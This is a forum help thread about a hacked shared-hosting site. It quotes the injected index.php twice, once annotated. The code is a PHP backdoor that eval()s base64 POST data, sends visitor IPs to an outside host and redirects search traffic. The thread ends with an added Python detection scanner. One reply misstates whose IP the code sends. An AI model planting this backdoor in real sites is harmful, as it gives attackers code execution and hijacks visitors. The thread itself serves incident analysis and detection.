
Web hacked, indexes removed??

Last Modified: 2013-11-16
Somebody this morning has removed all the index.php from the sections of one of my sites and replaced them with the attached code. How can I prevent this from happening again, and how could this happen? Does someone have access to my folders??

Attached the index.php with which they replaced the original ones.
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>


Michael Worsham, Cloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
Is this a shared hosting site or a dedicated hosting server?
Michael Worsham, Cloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
I did some quick research and the code seems to be some sort of header hack.

I did find a thread that has some PHP code someone wrote to run to detect pages that have this hack on their websites.
http://www.forum.optymalizacja.com/index.php?s=&showtopic=65618&view=findpost&p=506034

Author

Commented:
It's a shared hosting. I tried to see that forum, but I don't understand that language??

Is my server infected or anything? What am I doing wrong?
Michael Worsham, Cloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
If the hacker was able to access your account and modify your files, then your hosting provider has a serious breach and most likely your data is at risk. I recommend contacting your hosting provider to see if they have had any additional server-side intrusions. I would also send them a copy of the code you found so they can see if they are at risk as well for other sites.

Here is a Google Translated copy of the site (Polish to English):
http://translate.google.com/translate?hl=en&sl=pl&u=http://www.forum.optymalizacja.com/index.php%3Fshowtopic%3D65618&ei=tXSUSdXBMozMmQfO1p2NCg&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dtds_u.php%26hl%3Den%26safe%3Doff%26rlz%3D1B3GGGL_enUS287US287
Commented:
Basically, that script reads the website user's IP and does something with it that returns a value of go or false (other value). Then, if the value is go, it will submit the website IP address to a database where they can find vulnerable websites to be used for spyware, spamware, virus injection and other security-related issues.

I suggest you get your host to upgrade their software and security, or move hosts.

Attached is a snippet of the code, broken out into a programmer-readable version.


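<?php
// Backdoor: when POST field 'b' equals sha1(md5(a)), the base64-decoded
// contents of POST field 'a' are executed as PHP.
$a = @$_POST['a'];
if ($a && @$_POST['b'] == sha1(md5($a)))
{
    $a = base64_decode($a);
    eval($a);
}

// Sends the visitor's IP to the remote host and returns true only when
// the reply is exactly "go".
function get_counter()
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $uniq = @file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");
    if ($uniq === false)
    {
        return false;
    }
    if ($uniq == "go")
    {
        return true;
    }
    return false;
}

// Lower-cased Referer header of the current request.
$ref = strtolower(trim(@$_SERVER['HTTP_REFERER']));

// Referer contains "google" (but not "bot.htm"): redirect if get_counter() says so.
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false))
{
    if (get_counter())
    {
        @header("Location: http://gogapartnership.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}

// Referer contains "yahoo" (but not "slurp"): same redirect.
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false))
{
    if (get_counter())
    {
        @header("Location: http://gogapartnership.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}

?>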
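
A scanner for the traits of the injected index.php posted in this thread, added here as an example; it is not part of the original thread and is not the script from the Polish forum linked above. The indicator names and the character-gap limits in the patterns are assumptions made for this example.

```python
"""Scan a web root for PHP files carrying the traits of the injected
index.php quoted in this thread. Indicator names are made up for this example."""
import re
import sys
import time
from pathlib import Path

# Patterns derived from the posted sample; the gap limits (200/50/400
# characters) are assumptions chosen to keep the traits close together.
INDICATORS = {
    # POST data base64-decoded and passed to eval(): remote code execution
    "post-eval-backdoor": re.compile(
        r"\$_POST.{0,200}?base64_decode.{0,50}?eval\s*\(", re.S),
    # Redirect sent only when the Referer header is present and matches
    "referer-gated-redirect": re.compile(
        r"HTTP_REFERER.{0,400}?header\s*\(\s*[\"']Location:", re.S),
    # Visitor IP sent to a remote URL before deciding to redirect
    "remote-ip-lookup": re.compile(
        r"REMOTE_ADDR.{0,200}?file_get_contents\s*\(\s*[\"']https?://", re.S),
    # Host and script name that appear in the posted sample
    "known-host": re.compile(r"gogapartnership\.com|tds_u\.php"),
}


def scan_text(text):
    """Return the sorted names of all indicators present in text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root):
    """Map each matching *.php file (path relative to root) to its indicators."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        if not path.is_file():
            continue
        found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


if __name__ == "__main__":
    top = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for rel, found in scan_tree(top).items():
        # The modification time helps place the change in server and FTP logs.
        stamp = time.localtime((top / rel).stat().st_mtime)
        print(f"{rel}\t{time.strftime('%Y-%m-%d %H:%M:%S', stamp)}\t{', '.join(found)}")
```

Run it with the web root as the only argument; each output line gives the file, its last modification time and the indicators that matched.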
